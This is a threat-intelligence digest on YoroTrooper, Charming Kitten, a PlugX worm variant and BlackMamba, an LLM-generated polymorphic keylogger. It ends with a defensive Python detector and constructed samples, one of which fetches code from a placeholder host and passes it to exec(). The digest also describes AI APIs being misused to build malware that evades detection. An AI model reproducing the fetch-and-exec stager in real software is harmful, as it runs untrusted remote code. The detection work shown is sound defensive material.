At a glance.
- YoroTrooper targets CIS countries.
- Charming Kitten spearphishing campaign.
- PlugX campaign expands to Africa.
- AI used to generate polymorphic keylogger.
YoroTrooper targets CIS countries.
Cisco Talos is tracking a new threat actor the company calls "YoroTrooper," which has been conducting cyberespionage campaigns against Europe and CIS countries since at least June 2022. The threat actor primarily targets "government or energy organizations in Azerbaijan, Tajikistan, Kyrgyzstan and other Commonwealth of Independent States (CIS)." The threat actor has successfully compromised embassies of Azerbaijan and Turkmenistan, as well as accounts belonging to a "critical European Union (EU) health care agency and the World Intellectual Property Organization (WIPO)." YoroTrooper uses phishing emails with malicious attachments to distribute a variety of commodity Trojans.
The researchers believe the threat actor speaks Russian, but they don't attribute the group to any particular nation-state.
Charming Kitten spearphishing campaign.
Secureworks describes a spearphishing campaign targeting researchers who document the oppression of women in Iran. The researchers attribute the campaign to the Iranian government-sponsored group COBALT ILLUSION (also known as Charming Kitten, APT42, or Phosphorus), a threat actor that frequently targets "academics, journalists, human rights defenders, political activists, intergovernmental organizations (IGOs), and non-governmental organizations (NGOs) that focus on Iran." In this case the threat actor impersonates a researcher affiliated with the Atlantic Council think tank, using a fake Twitter account to message several people working on Middle Eastern political affairs research.
PlugX campaign expands to Africa.
Sophos is tracking a new version of the PlugX USB worm. The researchers say the “novel aspects of this variant are a new payload and callbacks to a C2 server previously thought to be only tenuously related to this worm.” PlugX is a long-known malware family that can spread via USB drives, which sometimes lets it reach air-gapped systems. The malware is currently spreading in African countries, with infections observed in Ghana, Zimbabwe, and Nigeria; the new variant has also been observed in Papua New Guinea and Mongolia. Sophos assesses that this campaign is linked to the Chinese APT Mustang Panda, which has used PlugX in the past.
Gabor Szappanos, threat research director at Sophos, stated:
“Back in November 2022, we reported on a different cluster of active adversary activity targeting government organizations in Southeast Asia that was also taking advantage of this ‘retro’ method of spreading via USB drives. This worm then appeared thousands of miles away in Africa a month later. Now, this latest cluster of USB worm activity is hopping across three different continents. We don’t typically think of removable media as being particularly ‘mobile,’ especially when compared to internet-based attacks, but this method of dispersion has proved to be highly effective in this part of the world.”
AI used to generate polymorphic keylogger.
Researchers at HYAS have developed a proof-of-concept polymorphic malware sample that uses OpenAI’s API to evade detection. The sample, which the researchers call “BlackMamba,” is a keylogger delivered as an apparently benign executable. Once run, BlackMamba reaches out to OpenAI and asks the model to generate keylogging code: “It then executes the dynamically generated code within the context of the benign program using Python’s exec() function, with the malicious polymorphic portion remaining totally in-memory. Every time BlackMamba executes, it re-synthesizes its keylogging capability, making the malicious component of this malware truly polymorphic. BlackMamba was tested against an industry leading EDR which will remain nameless, many times, resulting in zero alerts or detections.” The researchers then exfiltrate the captured keystrokes over a legitimate communication and collaboration tool (Microsoft Teams, in their test). The practical takeaway is that the on-disk artifact never contains the malicious logic, only the stager that fetches and exec()s it, so signature matching on the payload has nothing to match; defenders have to key on the stager pattern and on runtime behaviour instead.
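The BlackMamba technique leaves one static tell in the benign-looking carrier: a script that imports a network client and passes a runtime-built string to exec()/eval()/compile(). The triage heuristic below is an added example written for this page, not HYAS's code; it walks a Python file's AST and flags that combination. The sample scripts it runs on are constructed here for illustration, and the URL `https://llm.example/complete` is a placeholder standing in for the LLM API call the page describes.

```python
"""Static triage for the 'fetch code over the network, then exec() it' stager
pattern described in the BlackMamba write-up. Added example, not the
original research code; samples below are constructed."""
import ast

# Modules whose presence suggests the script can pull content from the network.
NETWORK_MODULES = {"requests", "urllib", "http", "socket", "openai", "httpx"}
# Builtins that turn a string into executable code at runtime.
DYNAMIC_EXEC = {"exec", "eval", "compile"}


def _call_name(node: ast.Call):
    """Return the dotted name of the called function, or None if not a simple name."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return None


def triage(source: str) -> dict:
    """Parse Python source and report network imports plus dynamic exec of
    non-literal arguments. 'suspicious' is True only when both are present:
    exec("literal") alone is noisy but not this pattern."""
    tree = ast.parse(source)
    network = set()
    dynamic = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in NETWORK_MODULES:
                    network.add(alias.name)
        elif isinstance(node, ast.ImportFrom):
            if node.module and node.module.split(".")[0] in NETWORK_MODULES:
                network.add(node.module)
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            if name and name.rsplit(".", 1)[-1] in DYNAMIC_EXEC and node.args:
                # A string literal is compiled from something visible on disk;
                # anything else (call result, variable, f-string) is built at runtime.
                if not isinstance(node.args[0], ast.Constant):
                    dynamic.append((node.lineno, name))
    return {
        "network_imports": sorted(network),
        "dynamic_exec": dynamic,
        "suspicious": bool(network) and bool(dynamic),
    }


# Constructed sample 1: the stager shape. fetch_payload() stands in for the
# LLM request that returns freshly generated keylogger source.
SAMPLE_STAGER = """\
import requests

def fetch_payload():
    # constructed stand-in for the model call that returns keylogger source
    return requests.get("https://llm.example/complete").text

exec(fetch_payload())
"""

# Constructed sample 2: exec of a literal, no network client. Not the pattern.
SAMPLE_BENIGN = """\
import json

exec("print('hello')")
CONFIG = json.loads('{"debug": true}')
"""

# Constructed sample 3: network client but no dynamic code execution.
SAMPLE_NET_ONLY = """\
from urllib.request import urlopen

body = urlopen("https://llm.example/status").read()
print(len(body))
"""

if __name__ == "__main__":
    for label, src in [("stager", SAMPLE_STAGER), ("benign", SAMPLE_BENIGN),
                       ("net_only", SAMPLE_NET_ONLY)]:
        print(label, triage(src))
```

This only catches the carrier on disk; the generated keylogger exists purely in memory, so the runtime complement is telemetry on the process (outbound requests to an LLM API from an unexpected binary, keyboard hooks, Teams webhook traffic) rather than any file signature. Expect false positives from legitimate plugin loaders that exec() downloaded code, which is exactly why the result should feed a triage queue and not an automatic block.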